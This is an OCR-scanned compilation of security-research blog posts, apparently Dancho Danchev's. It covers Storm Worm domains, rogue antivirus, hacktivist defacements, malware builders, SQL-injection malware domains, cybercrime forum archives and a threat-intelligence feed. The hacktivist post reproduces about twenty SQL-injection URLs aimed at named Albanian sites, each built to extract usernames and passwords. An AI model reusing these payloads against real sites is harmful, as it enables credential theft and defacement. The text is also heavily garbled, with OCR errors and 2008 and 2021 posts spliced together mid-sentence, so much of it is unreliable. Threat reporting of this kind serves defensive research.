injected domains. Related URLs for this campaign : 


banner82.com 
dil64.com 


aspx88.com 
bank11.net 
cookie68.com 
exportpe.net 
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HQ/s1600/BNMDF-0S01-i05. jpg 

37. https://1.bp.blogspot .com/-5f£nb1920-q8/Xs5meVtFs-1I/AAAAAAAAKLS/uux3gjCc8UYGYEyYN2c7w7 VWIOgLH1lvygCLcBGAsY 
HQ/s1600/Gorchilov_Ganchev_Markovski_KIT. jpg 

38. https://1.bp.blogspot.com/-KIWph9EeD9s/Xs5mt jDtYPI/AAAAAAAAKNE/LL1T5X48DekRSbQil jOJ-F50JgK4J_YqwCLcBGAsY 
HQ/s1600/kosiol1. jpg 

39. https://1.bp.blogspot.com/-sC2u78FNGWI/Xs5mtpT4-kI/AAAAAAAAKNA/9zF1ldzWkev8GsZcd6L6D_B1fNky1I172eQCLcBGAsY 
HQ/s1600/mitko-80x80. jpg 

40. https://1.bp.blogspot.com/-HtvaZ-VBouE/Xs5mjhOM2XI/AAAAAAAAKLO/PFk_ARhRO4MNpKEcEkvSn8hPtF6ktaM_ACLcBGAsY 
HQ/s1600/Mitko. jpg 

41. https://1.bp.blogspot.com/-UfAQNDJSDyI/Xs5muiGASyI/AAAAAAAAKNM/Kg57Pb j uw2Un8zCdJvTCdJB9EvbD_OzugCLcBGAsY 
HQ/s1600/pravetz-82_1984_Plovdiv. jpg 

42. https://1.bp.blogspot.com/-hAF5aan8vwM/Xs5mu5WXOXI/AAAAAAAAKNQ/Dtr3 JKpCjulS7UbnaWgF NYwf f8sTayVMACLcBGASY 
HQ/s1600/spisanieISOT1036C. jpg 

43. https://1.bp.blogspot.com/-1KDR71kB9eg/Xs5m1soVhAI/AAAAAAAAKL4/31ug9xxj IFEy51gypk1 JI Jén0-G4ROmHgCLcBGAsY 
HQ/s1600/WALERIO1. JPG 

44. https://1.bp.blogspot.com/- j5QDpi3YWMU/Xs5mmKV5tKI/AAAAAAAAKMA/WgF _FF JLohOrohgG6mXcn87B8BBfu0DzQCLcBGAsY 
HQ/s1600/WALERIO2. JPG 

45. https://1.bp.blogspot.com/-my0tHQY8pjE/Xs5mmrG4AuI/AAAAAAAAKME/CP3UbQNK1i09GI6yH7kiRWOVNxKx__3mQCLcBGAsY 
HQ/s1600/WALERI13. JPG 


17.3.22 Watch Dancho Danchev’s Keynote at CyberCamp 2016 - Exposing Koobface 
- The World’s Largest Botnet! (2021-03-30 19:50) 


Dear blog readers, 


I’ve decided to share a copy of my YouTube Keynote presentation presented at CyberCamp 
2016 discussing in-depth my research into the Koobface botnet including the actual details on 
how | eventually attempted to monitor and take it offline including the actual [1]PPT. Enjoy! 


Stay tuned! 
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1. https://speakerdeck.com/ddanchev/cyber- camp-exposing-koobface-botnet-02 


17.3.23 Exposing Bulgaria’s "Durzhavna Sigurnost" - The Complete Technical and 
Scientific Collection Archive During the Cold War - An OSINT Analysis 
(2021-03-31 08:09) 


[1] 


Dear blog readers, 


Have you ever wanted to take a peek inside Bulgaria’s "[2]Durzhavna Sigurnost" archive? It’s 
currently available on Cryptome.org including in particular - "[3]State Security and the Scientific 
and Technical Intelligence" where you can check out the original - "[4]Exposing Bulgaria - Or 
Who Build the Soviet Union’s Virus Factories in the 90’s? - An OSINT Analysis" including the 
original "[5]Exposing Bulgaria’s Involvement in Cold War Espionage - Who Stole the PC and 
Build a Fake Pro-Western Empire? - An OSINT Analysis" including "[6]Exposing the "KGB Hack" 
a.k.a Operation EQUALIZER - An OSINT Analysis”. 


Stay tuned! 


1. https://1.bp. blogspot . com/-7H7mcASOYV8/YGQO_OvT5uI /AAAAAAAAMCk/1iXNOYsSzqUAg1 _9m-6HAIx6PYR5SqVVACLcBGASYHQ 
2. https: //cryptome .org/2015/04/bn-sec/bn-state-security htm 
3, http: //cryptome. org/2015/04/bn-sec/SBORNIK- 13. pdf 


4. https: //ddanchev. blogspot .com/2020/05/exposing-bulgaria-or-who-build-soviet.htm 
5. https: //ddanchev. blogspot . com/2020/07/exposing-bulgarias-involvement-in-cold.htm 


6. https: //ddanchev. blogspot .com/2021/03/exposing-kgb-hack-aka-operation.htm 


17.3.24 Recommended High-Profile Espionage Movie for Watching! (2021-03-31 08:10) 


Dear blog readers, 


Remember the [1]DVD of the Weekend blog post series? I’ve decided to resume posting high- 
quality YouTube video and movies worth watching with the idea to continue the series. In this 
post I’ve decided to share the [2]Red Joan movie trailer which is a high-profile espionage movie 
which you should definitely consider watching. 
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Stay tuned! 


1. https: //ddanchev. blogspot .com/search/label/DVD/200f%20the%20Weekend 
2. https://www. youtube. com/watch?v=NBbmTF5Fn51 


17.3.25 Cyber Threats Facing U.K’s Internet-Connected Infrastructure - An OSINT 
Analysis (2021-03-31 08:12) 


[1] 
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In today’s modern Internet-connected World hundreds of thousands of users continue joining 
the Internet on a first-time basis potentially getting themselves exposed to a multi-tude of 
malicious software spam and phishing attacks including active participation in botnets which 
basically represent an automatically controlled tens of thousands of Internet-connected hosts 
under the supervision of a remotely-based Russian cybercriminal who’s making tens of thou- 
sands of money on a daily basis by using the access to the Internet-connected hosts potentially 
exposing home users and corporate networks to a variety of online-based threats such as for 
instance the direct compromise of the confidentiality availability and integrity of the targeted 
host and its infrastructure. 
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With more cybercriminals continue to look for ways to monetize access to malware-infected 
hosts by actively launching malware spam and phishing fraud campaigns online more users 
continue getting exposed and potentially falling victim into these type of scams with the cy- 
bercriminals behind these campaigns successfully compromising home-based and corporate 
networks while earning fraudulently obtained or generated revenue from the access to the 
malware-infected hosts. 


In the following free threat intelligence report we will offer an in-depth actionable intelligence 
on modern cyber threats facing U.K’s infrastructure with the idea to raise awareness on the 
degree of sophistication and persistence on behalf of Russian an international-based cyber- 
criminals who seek to obtain access to home and corporate-based networks possibly seeking 
financial gain. We will also provide a sample threat data to showcase our modern threat in- 
telligence platform in action which works by intercepting and reponding to modern cyber at- 
tack threats which include Client-Side Exploits, Web Site Defacements, Radical Propaganda, 
Scareware, Rogueware, Phishing, Spam, Malicious Software, Botnets, Command and Control 
Infrastructure, Compromised Web Sites, oney Mule Recruitment facing U.K’s infrastructure and 
actually notifies the affected party in an automated fashion. 


Users who are interested in gaining more insight into their network’s susceptibility to modern 
15122 


Read the complete assessment - [2]Fast-Fluxing SQL Injection Attacks Executed from the 
Asprox Botnet, and go through previous posts related to the botnet as well - [3]Phishing Emails 
Generating Botnet Scaling; [4]lnside a Botnet’s Phishing Activities; [5]Fake Yahoo Greetings 
Malware Campaign Circulating. 


1. http://blogs.zdnet.com/security/?p=1122 
2. http: //blogs .zdnet .com/security/?p=1122 
3 


. http://ddanchev.blogspot.com/2008/04/phishing-emails-generating-botnet .htm 


4. http://ddanchev. blogspot . com/2008/02/inside-botnets-phishing-activities.htm 
5. http: //ddanchev. blogspot . com/2008/04/fake-yahoo- greetings-malware-campaign. htm 


4.5.19 All You Need is Storm Worm’s Love (2008-05-20 14:15) 


The Storm Worm malware launched yet another spam campaign promoting links to malware 
serving hosts, in between [1]a SQL injection related to Storm Worm. 


These are Storm Worm’s latest domains where the infected hosts try to phone back : 


cadeaux-avenue.cn (active) 
polkerdesign.cn (active) 


tellicolakerealty.cn (active and SQL injected at vulnerable sites) 
Administrative Email for the three emails : glinsonl156 @ yahoo.com 


Related DNS servers for the latest campaign : 


ns.orthelike.com 
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cyber attack threats including their home and corporate network including their ISP (Internet 
Service Provider) should approach us at - dancho.danchev@hush.com 


Sample geolocation graphs of malicious and fraudulent threats facing U.K based 


Internet-connected infrastructure: 


[2] 


ondongerwDerry 


Dublin 
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Inverness 
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[3] 
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[4] 


F 
“4 


+ 


Schleswig- 


Holstein’ Mecklenb 


ire / Ireland 


lean 


Center. 53.99485,-2.24121][™y 


[5] 
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[6] 


UK-2 Limited 


Fetet 5 Online S.a.s. 
ServerFicune Lid Host distribution by ISP AMAZON-02 


Awareness Softwar...-\ AS-INAPCDN-OCY 
Entanet M247 Ltd 
QUANTILNETWORKS Hydra Communicati... 
TalkTalk Host Europe GmbH 
Safe Hosts Intern... Krystal Hosting Ltd 
Virgin Media Limited lomart Cloud Serv... 
MVPS LTD = /- MICROSOFT-CORP-MS... 
Linade, LLC . COGECO-PEER1 
SHOCK-1 = VeloxServ Commuri... 
ICUK Computing Se... Fast4networks Ltd 
Kcom Group Limited Adapt Services Li... 
DIGITALOCEAN-ASN A Coreix Ltd 
NAMECHEAP-NET i AS-CHOOPA 
EE Limited F' GOOGLE 


NBNBANY 


Rritich Talarammi 


[7] 
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IP Country City Region IsP Org Latitude Longitude 
68.183.254.57 United London England DigitalOcean, DigitalOcean, LLC 51.5177 -0.6215 
Kingdom LLC 
51.89.176.159 United London England OVH SAS OVH Ltd $1.5164 -0.093 
Kingdom 
| | | | | | } 
165.22.113.227 United London England DigitalOcean, DigitalOcean, LLC 51.5177 = -0.6215 
Kingdom LLC 
t t t ! ’ 
77.68.64.16 United Gloucester England Fasthosts Fasthosts 51,8613 -2.25056 
Kingdom Internet Ltd Internet Limited 
77.68.64.2 United Gloucester England Fasthosts Fasthosts 51.8613 -2.25056 
Kingdom Internet Ltd Internet Limited 
} 4 1 4 } | 4 
31.22.4.141 United Newcastle England Wildcard | Fastnet Ltd 54.9881 -1.6194 
Kingdom upon Tyne Networks 
46.37.172.123 United Brighouse England UKFAST.NET Infra AW 53.7032 -1.7843 
Kingdom LIMITED 
185.52.27.174 — United Slough England Paragon Internet Host Europe 51.4991 -0.5545 
Kingdom Group Limited GmbH 
77.68.64.3 United Gloucester England Fasthosts Fasthosts 51.8613 -2.25056 
Kingdom Internet Ltd Internet Limited 
| | i : | | i 
31.132.1.41 United London England UK Dedicated UK Dedicated -$1.5164 -0.093 
Kingdom Servers Limited Servers Ltd 
[8] 
Spam activity log 
0004 
000% 
9002 
001 
Des »y Jan MIO Feo G0 Mar 2) Age 2200 May 20 Jue 20 Jub 20 eng FDO See 2020 Oa 2m20 teow 2220 Dec 000 
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@ — spam active IP adresses 


[9] 


ns2.orthelike.com 
ns3.orthelike.com 


ns4.orthelike.com 


ns.likenewvideos.com 


ns2.likenewvideos.com 
ns3.likenewvideos.com 


ns4.likenewvideos.com 


Storm Worm related domains which are now down: 


centerprop.cn 
apartment-mall.cn 
stateandfed.cn 
phillipsdminc.cn 
apartment-mall.cn 
biggetonething.cn 
gasperoblue.cn 
giftapplys.cn 
gribontruck.cn 
ibank-halifax.com 
limpodrift.cn 
loveinlive.cn 
newoneforyou.cn 
normocock.cn 
orthelike.com 
supersameas.com 
thingforyoutoo.cn 
One of the domains that is injected as an iFrame is using ns.likenewvideos.com as DNS 


server, whereas likenewvideos.com is currently suspended due to "violating Spam Policy". 
Precisely. 


Related posts: 

[2]Social Engineering and Malware 

[3]Storm Worm Switching Propagation Vectors 
[4]Storm Worm’s use of Dropped Domains 
[5]Offensive Storm Worm Obfuscation 
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[6]Storm Worm’s Fast Flux Networks 
[7]Storm Worm’s St. Valentine Campaign 


[8]Storm Worm's DDoS Attitude 
[9]Riders on the Storm Worm 


[10]The Storm Worm Malware Back in the Game 


H 


10. http: //ddanchev. blogspot .com/2007/08/storm-worm-malware-back- in-game. htm 


4.5.20 Fake PestPatrol Security Software (2008-05-20 17:41) 


P® Pest-Patrol 


antispyware protection 


Protect Yourself 

STOP SPYWARE AND SPAM 
Scan Your System 
for FREE with Pest-Patrol! 


Spyware in news 


Reasons to buy PestPatrol 


VW Hohts Browser Hijackers 
© of Graves Browser Hetory 
vf Ante Phishing Protection 
J Fights Sopware 
J Fights Adware 
Jf Blocks Pop-ups 
Jf FREE Ontine Support 


© ZOE. Pent Patrol, Ine 


Prerview | Festeres [TAQ | Gdesrery | Alleles | Prevecy Paley 


. http://blogs.zdnet.com/security/?p=1131 
http: //ddanchev.blogspot.com/2007/01/social-engineering-and-malware .htm 


. http: //ddanchev. blogspot .com/2007/08/storm-worms-use-of-dropped-domains. htm 
. http: //ddanchev.blogspot .com/2007/08/offensive-storm-worm-obfuscation. html 
. http: //ddanchev. blogspot .com/2007/09/storm-worms-fast-flux-networks.htm 


. http://ddanchev. blogspot .com/2008/01/storm-worms-st-valentine-campaign.htm 
. http: //ddanchev. blogspot .com/2007/09/storm-worms-ddos-attitude.htm 


. http: //ddanchev.blogspot .com/2007/12/riders-on-storm-worm.htm 


On BUYING 
OUR PROGRAM 
Vitw OFries 


What is Spyware? 


Limited Offers 


PesT PATO®E PEST PATEDE 
ANTISPWARE ANTEUPYTARE 
$49.95 $49.95 


Me artepyware bt el 
protect your PC from 


Continuing [1]the rogue security [2]software series I’ve just [3]stumbled upon a fake PestPatrol 
site - pest-patrol.com (85.255.121.181) hosted at the [4]the RBN connected Ukrtelegroup Ltd 
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(85.255.112.0-85.255.127.255 UkrTeleGroup UkrTeleGroup Ltd. 27595 ASN ATRIVO ), just like 
the majority of sites assessed in previous posts. 


Where’s the malware at pest-patrol.com ? In one of these anecdotal cases, the way the 
people behind these rogue sites use the same template over and over again, and conse- 
quently forget to change the rogue software’s name, in this case, not only is pest-patrol.com’s 
mail server responding to antispycheck.com , but they’ve also uploaded a broken template. 


1, ftp: //adanchev. ogepot .con/ 2006/06 /got~your~apshield-up-and- running. tal 
2, http:/ /adanchey. blogspot .con/2008/04/ocal ized fake-security-softare.htnl 
3, http: //ddanchev. blogspot .con/2008/09/portfolio-of-fake-video-codecs. ntl 
4, http://édanchey blogspot .con/2008/02/geolocating-nal cious~ieps. heal 


4.5.21 Pro-Serbian Hacktivists Attacking Albanian Web Sites (2008-05-20 22:05) 


hater/ rub. pnp? ide «12leand+i«2+unt oneal leselectei,2, 3.4, 5,6, concat (username, char (58), password), &, 9,10, 21, 12+fromeeditor--élea 


aler4_info. php?) angefnéidr «18141 da-LO+andel-2eunioneal leselectsl, 2, 3,4, comcat(username, char(5&), password), 6+fromeeditor/* 


https /y rub. php? idr«Srandel-2euntioneallesel 2,3, concat(username, char (58), password), 5,6, 7,5, 9efromeeditor--dl<a 


hate: /) galert_tnfo. php?) 369-4461 da-3eandes «2 Vfoneal leselectei, 2,3, comcat (username, char(58), password), 5, 6+fromeeditor/* 
http: /, galer1_info. php? lang-AL4ida=4eand+l-2eunloneal leselectel, 2,3, comcat (username, char($8), password), 5, 6efromeeditor/* 
http: /y ra/galeri_info. php? langeai 41 dr «8241da all oncat (username, char (58), password), $, 6efromeeditor/* 
hatg:/ adanet. com. al/tekst. ohp?idt ndei« t+i , char (58), password), 3,4, 5,6,7,8,9,10+fromenysq].user/* 


http es.com.al/porint. php? lajmtO«922° ¢andel-2euntoreal leselectel, 2, concat(username, char(58), password),4,5, 

http index. php? ] anquage-4page-1 4 deShendetes ia‘ +andel lect+concat (user, char ($8), p ome li 

http index, php? anquage-épage+1 1 etes ia sande] Ser pas swordefromeuser 

htt -com/s hp? idf «1° «and 1 2 select at Cusername, char ($8), password) , Sefrometblusers/* 

http - com hp? idf«1" eandel«2euntoneal leselect cat Cuname, char (58), passed), 3,4,5,6,7, Sefromeauthuser/* 

http ide1, 371‘ eand+l-2+unioneal leselect+ loginefrom 

http ide1, 371‘ +andele2+urrl oneal l+sel ect +gworfromeu 

http 1. com/spoet t-lajme. php? id-3856eandel«2+untomeal leselactel, 2, 3.4, 5, comcatCuser, char(58), pass). 7,8. 9,120.11, 124fros+cube_store_confi 
http: /, com/lajmet . php? id=S40eandel-2euntonmeal leselectel,2,3,4,5,comcat(emrt, char(58), ffalkalimt )efromeadnin/* 

http: /y r.com/inseratedetails. php? ide24?' +andeleleunioneal leselect+l1, 2, 3,4, 5, concat (username, char ($8), passwort), 7,8, %,10,12,12,13,14,15,1 
htta:/ rt_alb/cal_det. html ?ide23+andel«2+untoneal leselectel, concat (userid, char (58), password), 3,11, mull, mull, mull, mul lefrosusers/* 
http: /; com/news cat. pho? id-Seandel«leuntoneal lesele concat (username, char($8),password),3,4, S¢fromett_users/*4cate$ 

http: /y strave. 41/showa lbum, php7albunt0«16' ¢andel«2 mealleselectel, 2,3. concat (username, char(58), userpassword), $,6, 7.8, 9,10, Liefroseon 
http: / al/index. pnp?fage-detat 141d-6' «and+l-l+unto lieselectel, concat (username, char($8), fjalekaliat),3,4,5,6,7,d+frosusers/*aenue?) 
http:/ net /index. php? pg-pr odukt e&1 d-17¢andel-2eunt Nieselectel, concat (user, char (58), pass), 3,4, Sefromeautorerehererid=1/* 

htte:/, Tami ly. com/index. phap?Fageeshfagqlajmslajet d--999Seuntoreal leselectel, 2, convert (concat_ws (char (58), username, password)eus ingrut fs), 
net: /, tion. org. al /?fqemes 1aat -newsGal d=? Tf qemes 1aet «shf agartéaid-47" +andel-2+untomeal leselects1, 2,3, concat_ws(char( 58), username, userpass 
http: /y /rt qemes {dat eshfagartéaid=90' eandel-2eurioneal leselectel, 2, concat (username, char ($8), userpassword),4,5,6,rull, 5, 9efromeusers/* 
httoi/y n/showa Thun. pho? a Them 0-8 +andel-2+untoneal leselect+l, 2.3. concat (username, char (58). userpassword). 5.6.7.8, 9.10+fromeces_users/* 


The rise of [1]pro-kosovo web site defacement groups was marked in April, 2008, with a 
massive web site defacement spreading pro-kosovo propaganda. The ongoing monitoring 
of pro-kosovo hacktivists indicates an ongoing cyberwar between pro-serbian supporting 
hacktivists successfully defacing Albanian sites, and building up capabilities by releasing a 
list of vulnerable Albanian sites (remote SQL injections for remote file inclusion, defacements 
or [2]installing web shells/backdoors) to assist supports into importing the list within their 
[3]do-it-yourself web site defacement tools. 


Go through the complete post - [4]Pro-Serbian hacktivists attacking albanian web sites. 


Related posts: 


[5]Hacktivism Tensions 
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[6]Hacktivism Tensions - Israel vs Palestine Cyberwars 
[7]Mass Defacement by Turkish Hacktivists 
[8]Overperforming Turkish Hacktivists 


_ep:/[Adanchev. blogspot. con/9008/04/xise~of-kosovo-defaconent~groups. bel 
_http:/ /adanchey.blogepot .con/2001 /04/compilation-of-veb-backdoors heal 

_ http: / /ddanchev. blogspot .con/2008/04/conmercial-veb-site-defacenent-tool tal 
| http:/ blogs zinet. con/security/?p-1145 

_hetp:/ /adanchev blogspot .con/2006/02/aacktivisn- tensions. htal 


http: //ddanchev.blogspot.com/2006/07/hacktivism-tensions-israel-vs.htm 


http: //ddanchev. blogspot .com/2007/11/mass-defacement-by-turkish-hacktivists.htm 


. http: //ddanchev.blogspot .com/2007/11/overperforming-turkish-hacktivists.htm 


4.5.22 The Whitehouse.org Serving Malware (2008-05-21 09:38) 


# Result Protocol Host URL Body Content-T... 
2 304 HTTP fincludes/global.css 0 

& 3 304 HTTP se.org fimages/inavba. aif 0 

4 304 HTTP .org iwhitehouse. jpa 0 

& HTTP 


The [1]Whitehouse.org a parody site of the original Whitehouse.gov is serving malware. From 
[2]TrendMicro’s blog : 


" According to Trend Micro Advanced Threats Researcher David Sancho, whitehouse.org 
has been compromised to harbor some malicious, obfuscated JavaScript code which “back- 
ground downloads” code to unsuspecting visitors of the site, where a malicious file is 
downloaded (which is detected by Trend Micro as TRO) _DELF.GKP ). Of course, the official 
White House Web site is whitehouse.gov, and although it has been reported that some people 
believe whitehouse.org is the real deal, even those looking for this site specifically should be 
forewarned. " 


67.15.192.19 ———_____*-_™ AS30315 
—_- 
uth —— 
67.15.212.150 TE ov s67-15-212150.evl serveranet 
aw 
Cad cx88.info > ge 70988.50.153 ms > 
a 
4 mex - a 
— managednsl.estboxes.com  69.50.182.20 
~ | an . = 
info ms wt 
— -_. manegedns2 estboxes.com 5m 69.50.183.26 7 “Biss ~ 
ne 69.50.182.0/23 ——S—@ AS27595 
” wer 
aS manegedns 2 estboxes.com em 69.50.182.22 ay we wv 
—— 


manegedns4 estboxes.com ———<A- > 69.50.183,90 
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The malicious domain embedded within the site ad.ox88.info/13.htm (67.15.212.150) is using 
Mal/Obf]S-AP/Exploit: HTML/AdoStream to serve the malware, whereas the domain itself is using 
DNS servers known to provide service to malicious domains from previous malware embedded 
attacks that I’ve been assessing. 


1. http://www. google.com/interstitial?url=http: //www.whitehouse.org/ 


2. http://blog.trendmicro.com/whitehouseorg-pwnd-serving-malware/ 


4.5.23 Yet Another DIY Proprietary Malware Builder (2008-05-21 15:51) 


Binder | Options | \ponems: Binder Options 


Drop path: ¥ Execute 
c:\dropped. exe 


Bind & spread a tenary via USB devices eek on Des: v7 _Mok 
- ActveX startup, # tals ot disabled uses Xeinda X\system32\dlicache WIRUS.exe 
HKLM/HKCU 
- Disable "Show hadden files and folders" USB Infection path: 


RECYCLER \svchost. exe 


File to bind: 


Features 


Mutex: 
TVVURVAVUDl« 


HKLM/HKCU key name 

WindowsUpdate 

¥ ActiveX 

{83D 4S7QA-045E-5307-DFC9-SBF14604275F} 
Disable “Show hidden files and folders” 


Following [1]the most recent proprietary [2]web malware exploitation kits, and [3]DIY malware 
tools [4]found in the wild, this is among the latest malware builders with a special emphasis 
on spreading from PCs to USB mass storage devices, and from USB mass storage devices to 
PCs. On 2008/04/28 when a sample generated binary was checked with multiple antivirus 
scanners, the detection was 2/32 with Panda Security and F-Secure detecting it, according to 
the seller of the builder. 


For the time being, malware authors continue emphasizing on the product concept, namely 
they build a malware based on their perception of what a malware should constitute of, then 
start offering it for sale as well as it’s source code. In the long-term however, based on 
the increasing number of malware and spyware coding on demand, malware authors would 
undoubtedly embrace the customerization concept and start putting more efforts into figuring 
out what the customer really want compared to their current "built it, price, advertise it" and 
they’ll come mentality. 


Moreover, despite the [5]generated buzz over [6]the Zeus banker malware and its copy- 
right notice, Zeus remains publicly available, and so is its source code, [7]placing it under 
the [8]open-source malware segment. So emphasizing on how malware authors are trying to 
protect their work is exactly what’s not happening right now. Releasing it in open-source form 
increases its life cycle, and both, the original authors, and the community build around the 
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Distribution of keywords (No of Cases) 


} r 
| | 
LECMPALELM ENG LEY GONE Gil MLE 


Items 


| | 


Distribution of keywords (Frequency) 
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CKPUNTUHE 1,7% 


Distribution of keywords (Frequency) 


PROXY 2,1% CISCO 2.1% 


DUMPS 2,1 NMPODAKA 2.3% 
MATASUHE 2, } ele axe _— 
ODOS 1, , 


ORIGIN 2.3% 
AMEX 2.4% 


CNOMNEP 2.6% 


PRICE 1.7% 
YOUTUBE 1,7% | 


BITCOIN 1,7% 


PAYMENT 1.7% ONnyYDEPb! 2.7% 
WEBMONEY 1,7% 
AKKAYHTA 1.7% CNAMEPD! 2,7% 
NAPCEP 16% 
: AHDPOMD 0.7% 
— en 08% 
NOH 1,6% 
CMAM 1.6% OMRREONMED TO% 
ROPYBISTE 0.9% 
AMAZON 1,6% 
TOBAPOB 1.6% MEPRMEBEBIID.9% 
CEPBEPA 1,5% be” OsRRUTEED AGE. 0.9% 
Yy3BUMOCTb 1,5% Y wreupyeni 0.9% 
SSH 1,4% veneSSHGR 99% 
grey CLOUDRAGROAT#41.1% 
MAPONM 1.4% PACCBINKA GEPBHCOB 1.1% 


AOKYMEHTbI 1,2% 


Sample publicly accessible cybercrime-friendly forum communities included in the original 


Data Set include: 


evilhack.ru.rar 


gerki.pw.rar 
ProLogic.rar 
SEOForum.rar 
c-cracking.org.rar 
Whitehat.vn.rar 
neadekvat.ru.rar 
Wwww.opensc.ws.rar 
gofuckbiz.com.rar 
Darkode.rar 
hackademics.fr.rar 
darkmoney.de.rar 
xaker.name.rar 
Xakep.bg.rar 
sysadmins.ru.rar 


PhreakerPro.rar 
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Master-X.rar 

Chf.rar 
Darkmarket.la.rar 
Webmasters.ru.rar 
reversing.cc.rar 
monopoly.ms.rar 
Exelab.rar 
blacktip.top.rar 
ghostmarket.net.rar 
DomenForum.rar 
Antichat.ru.rar 
Hack-Port.rar 
ProxyBase.rar 
replace.org.ua.rar 
Eviloctal.rar 
Xakepok.rar 
WWH-Club.rar 
Szuwi.rar 
GoFuckBiz.rar 
www.forohack.com.rar 
Promarket.rar 
pay-per-install.org.rar 
LinkFeed.rar 
TotalBlackhat.rar 
Mr11-11mr.7olm.org.rar 
iFud.rar 
Piratebuhta.pw.rar 
BPCForum.rar 
ForumSEO.rar 
Cracked.to.rar 
Forum.Zloy.bz.rar 
ProCrd.rar 
Crack-Forum.rar 
alligator.cash.rar 


Mmpg.ru.rar 
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MaulTalk.rar 
ForumSape.rar 
SEOCafe.rar 
dwh.su.rar 
BigFozzy.rar 
Gla.vn.rar 
Zismo.rar 
it-24h.com.rar 
Forum-UINSell.rar 
carderplanet.rar 
4HatDay.rar 
Toolbabase.se.rar 
ubotstudio.com.rar 
aHack.rar 
Linuxac.org.rar 
imhatimi.org.rar 
Svuit.vn.rar 
Free-hack.rar 
xaknet.org.rar 
www.ryan1918.com.rar 
Darkmoney.rar 
shadowcrew-2.rar 
Hackersoft.rar 
BlackhatWorld.rar 
Nullnoss.org.rar 
365Exe.rar 
Aljyyosh.rar 
forum.cybsecgroup.com.rar 
Hackingboard.rar 
Szenebox.rar 
Cardvilla.rar 
iHonker.rar 
SkyFraud.rar 
H4kurd.com.rar 


moneymaker.hk.rar 
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CNSec.rar 
Cyberizm.rar 
Turkhackteam.rar 
forum.reverse4you.org.rar 
CNHonker.rar 
security-teams.net.rar 
itsobr.com.rar 
Spyhackerz.rar 
ArmadaBoard.rar 
iransec.net.rar 
xaker26.info.rar 
11Wang.rar 


Hackings.rar 


Stay tuned! 


1. fietps://4. bp. blogspot. con/-~GkPGzTxV6s/YFeBOOTDvET/AAAAAAAAIAT/iipDSUZGVESIAfxogL 901xP29CeAplawCLDGASYH 
2, hetps://adanchev. blogspot. con/3020/07 /eybercrine- foruidata-set-2019-freo, heal 
3, httpe://adanchey. blogspot .on/2001/02/dancho-danchevs-lav-enforcenent-and. nt 


17.4.2 Recommended High-Profile Psytrance Song of the Day! (2021-04-06 20:51) 


Dear blog readers, 


This is Dancho. | wanted to take and effort and present a newly launched series of blog posts 
called "Psytrance Song of the Day" where | intend to share with you some of the high-profile and 
currently circulating psytrance songs with the idea to help you reach out to a new Set of music 
including to empower you with a new set of music choice for your listening and enrichment 
experience. 
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Stay tuned! 


17.4.3 Dancho Danchev’s Blog - Proprietary MISP (Malware Information Sharing Plat- 
form) Instance Running - Request Access Today! (2021-04-07 14:11) 


MISP 


Threat Sharing 


Dear blog readers, 


This is Dancho. | wanted to let everyone know that I’ve recently started running a proprietary 
MISP (Malware Information Sharing Platform) instance where | distribute and share most of my 
proprietary research with a variety of third-parties including connected instances or users who 
have API access to my research which is now also available in STIX/TAXII including MISP format 
where you or your organization can request API access to my proprietary threat intelligence 
feed for research or commercial purposes by approaching me at dancho.danchev@hush.com 


Sample categories which I cover in my daily batch of proprietary threat intelligence research 
include: 


¢ Targeted Malware Analysis - An Analysis 
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¢ In-the-Wild Malware Analysis - An Analysis 


Targeted Phishing Analysis - An Analysis 


Malicious URL Analysis - An Analysis 
¢ Targeted Mobile Malware Analysis - An Analysis 


¢« APT Coverage - New Campaign 


Fraudulent Infrastructure - An Analysis 


¢ Online Fraud Campaign - An Analysis 


Historical OSINT Campaign - An Analysis 


¢« Russian Business Network coverage 


Koobface Botnet coverage 

* Kneber Botnet coverage 

¢ Hundreds of IOCs (Indicators of Compromise) 

¢ Tactics Techniques and Procedures In-Depth Coverage 

¢ Malicious and fraudulent infrastructure mapped and exposed 
¢ Malicious and fraudulent Blackhat SEO coverage 

e Malicious spam and phishing campaigns 

¢ Malicious and fraudulent scareware campaigns 

¢ Malicious and fraudulent money mule recruitment scams 

¢ Malicious and fraudulent reshipping mule recruitment scams 
¢ Web based mass attack compromise fraudulent and malicious campaigns 


¢ Malicious and fraudulent client-side exploits serving campaigns 


Sample screenshots of the research posted at my proprietary MISP (Malware Information 
Sharing Platform) instance: 


* Curche Denchey Oenche Dancher = 9 


15182 


malware benefit from the new features introduced within. 


And now that the most popular web malware exploitation kits are already localized to 
Chinese due to their open-source nature, making it harder to maintain a decent situational 
awareness on the new features introduced courtesy of third-party coders, we may that easily 
see Zeus localized to Chinese as well. It’s a trend, not a fad. 


ttp://ddanchev. blogspot .com/2008/05/small-pack-web-malware-exploitation-kit.htm 


ttp://ddanchev.blogspot.com/2008/04/diy-exploit-embedding-tool-proprietary.htm 


ttp://ddanchev.blogspot.com/2008/04/firepack-exploitation-kit-part-two.htm 


. http://ddanchev. blogspot . com/2008/04/skype-spamming-tool-in-wild.htm 


1 
2 
3 
4 
5. http://arstechnica.com/news.ars/post/20080428-malware-authors-turn-to-eulas-to-protect-their-work.htm 
6 
7 
8 


. http: //ddanchev.blogspot .com/2008/04/crimeware-in-middle-zeus.htm 


ttp://ddanchev. blogspot .com/2007/09/custom-ddos-capabilities-within-malware.htm 


. http: //ddanchev.blogspot .com/2007/09/localizing-open-source-malware .htm 


4.5.24 Malware Domains Used in the SQL Injection Attacks (2008-05-22 15:42) 


www .nihaorrl.com 468,000 
free. hostpinoy.info 444,000 
xprmn4u.info 369,000 
www. nmidahena.com 140,000 
winzipices.cn 75,000 
sb.5252.ws 69,000 
Www. aspder.com 62,000 
www.11910.net 47,000 
bbs.jueduizuan.com 44,000 
www. bluell.cn 44,000 
Www ,.2117966,net 39,000 
$,.5@09.us 39,000 
xvgaoke.cn 33,000 
1.ha0929.cn 20,000 
www.414151.com 17,000 
yll8.net 15,000 
www.kisswow.com.cn 13,000 
urkb.net 13,000 
c.uc8010.com 9500 
ramb.net 7000 
www. rinwow.cn 6000 
www. killwowl.cn 4000 
wiew Qiqgigm.com 3600 
www, wowgml.cn 3500 
www. wOwYyeye.cn 2800 
9iSt.cn 2500 
computershello.cn 2300 
wivtw, Z008.net 1600 
b1S.3322.o0rg 1200 
www .direct84.com 1100 


Whereas the value of these malicious domains lies in the historical preservation of evidence, as 
long as hundreds of thousands of sites continue operating with outdated and unpatched web 
applications, the list is prone to grow on a daily basis, thanks to copycats and the [1]Asprox 
botnet. The Shadowserver Foundation’s [2]list of malicious domains used in the SQL injection 
attacks : 
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Stay tuned! 


